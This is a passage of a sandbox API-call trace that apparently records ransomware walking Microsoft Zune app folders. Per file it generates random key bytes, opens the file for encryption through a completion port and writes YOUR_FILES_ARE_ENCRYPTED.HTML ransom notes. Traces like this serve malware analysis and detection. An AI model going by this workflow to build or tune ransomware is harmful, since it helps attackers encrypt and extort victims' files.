dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.101] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.102] CloseHandle (hObject=0x324) returned 1 [0121.102] GetProcessHeap () returned 0x600000 [0121.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.102] GetProcessHeap () returned 0x600000 [0121.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.102] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.102] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.102] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings") returned 91 [0121.102] GetProcessHeap () returned 0x600000 [0121.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.102] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings" [0121.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\*" [0121.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.103] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.103] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.103] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.103] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 104 [0121.103] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.103] lstrlenW (lpString=".lock") returned 5 [0121.103] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.103] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.103] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.103] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat") returned 104 [0121.103] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.103] lstrlenW (lpString=".dat") returned 4 [0121.103] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.103] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.103] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.104] GetProcessHeap () returned 0x600000 [0121.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.106] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3D") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="37") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="CF") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B6") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="39") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B5") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="27") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="8D") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="13") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="4D") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="19") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="37") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="EA") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A5") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="3C") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A9") returned 2 [0121.106] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="9A") returned 2 [0121.107] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="62") returned 2 [0121.107] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="23") returned 2 [0121.107] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="BB") returned 2 [0121.107] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="7E") returned 2 [0121.107] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="06") returned 2 [0121.107] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="12") returned 2 [0121.107] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="89") returned 2 [0121.107] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="BE") returned 2 [0121.107] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="CA") returned 2 [0121.107] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="91") returned 2 [0121.107] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E5") returned 2 [0121.107] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="60") returned 2 [0121.107] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E5") returned 2 [0121.107] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E6") returned 2 [0121.107] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="51") returned 2 [0121.107] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat" [0121.107] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.107] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.111] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0121.111] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.111] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0121.111] GetProcessHeap () returned 0x600000 [0121.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.113] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.114] CloseHandle (hObject=0x324) returned 1 [0121.114] GetProcessHeap () returned 0x600000 [0121.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.114] GetProcessHeap () returned 0x600000 [0121.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.115] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.115] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.115] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData") returned 96 [0121.115] GetProcessHeap () returned 0x600000 [0121.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.115] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData" [0121.115] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\*" [0121.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626878 [0121.115] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.115] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.115] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0121.115] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.115] GetProcessHeap () returned 0x600000 [0121.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.116] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.117] CloseHandle (hObject=0x324) returned 1 [0121.117] GetProcessHeap () returned 0x600000 [0121.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.117] GetProcessHeap () returned 0x600000 [0121.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.117] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.117] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.117] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState") returned 92 [0121.117] GetProcessHeap () returned 0x600000 [0121.117] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.117] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState" [0121.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\*" [0121.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.117] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.117] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.117] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.117] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.117] GetProcessHeap () returned 0x600000 [0121.117] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.118] WriteFile (in: hFile=0x324, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.119] CloseHandle (hObject=0x324) returned 1 [0121.119] GetProcessHeap () returned 0x600000 [0121.119] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.120] GetProcessHeap () returned 0x600000 [0121.120] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.120] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.120] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.120] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0121.120] GetProcessHeap () returned 0x600000 [0121.120] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.120] WriteFile (in: hFile=0x214, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.121] CloseHandle (hObject=0x214) returned 1 [0121.121] GetProcessHeap () returned 0x600000 [0121.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.121] GetProcessHeap () returned 0x600000 [0121.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.124] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.ZuneVideo_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ZUN")) returned 1 [0121.124] StrStrIW 